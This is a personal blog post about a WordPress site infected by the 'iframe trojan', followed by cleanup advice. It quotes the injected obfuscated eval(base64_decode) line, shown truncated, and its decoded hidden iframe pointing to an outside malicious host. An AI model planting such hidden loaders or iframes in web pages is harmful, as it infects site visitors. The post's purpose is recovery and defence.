So I decided to go back to blogging, I update wordpress to the latest version and started typing along acouple of posts before it hit me. Something was really getting fishy around the blog, The Dashboard all of a sudden decided to stop functioning and taking me to a blank white page and a couple of hours later other sections of the blog were also pointing to either dead links or showing gibirish scribbles. It took me a good two hours and the help of an expert to realize what had happened.. I was hacked!

Something somehow.. inserted a malicious code into each and every single PHP file in the entire blog. What I saw was a one liner right at the beginning of the infected PHP file that looks like this:

< ?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl...=="));?>

When I decoded it (using this), it revealed the following:

< -iframe src="http://iss9w8s89xx.org/in.php" width=1 height=1 frameborder=0>

(Which is the keyword I used to google it, the “iframe trojan” is what it apparently called)
Why would anyone want to hack a dormant blog you’d ask? It was all automated..

My FTP program stores all saved website password in an unencrypted text file which is how the Trojan gained access to the website.

I have spent extensive time researching the matter online and thought I’ll spare whoever it is that decides to google this the pain I had to go through. Now forget all those wordpress support forum contributors or other blogs that advice a fresh install of WordPress or those that tell you to manually edit each and every php file you have for the code.

What you have to do is the following:

• Change ALL your passwords: I still didn’t figure out what passwords exactly are the ones that are used, I would advice to change the WordPress Password and the FTP most importantly.
• Download the ENTIRE site to your local machine.
• Clean up the files using this VBS Script I found on “Thydzik’s technology blog” here to automate the cleaning process. Place it in your local root director and run. A log file will be generated at C:\cleanUpWordPressPHP.txt listing the files it has cleaned.(More details here)
• Re-upload the site.
• Download, Install and Update WordPress Antivirus Plugin (here)

The Trojan wasn’t designed with wordpress in mind and that’s why I believe the damage was minimal, it is just a true pain to get rid of. I have officially wasted two evenings of my life doing nothing but this.

Further Information about this can be read on this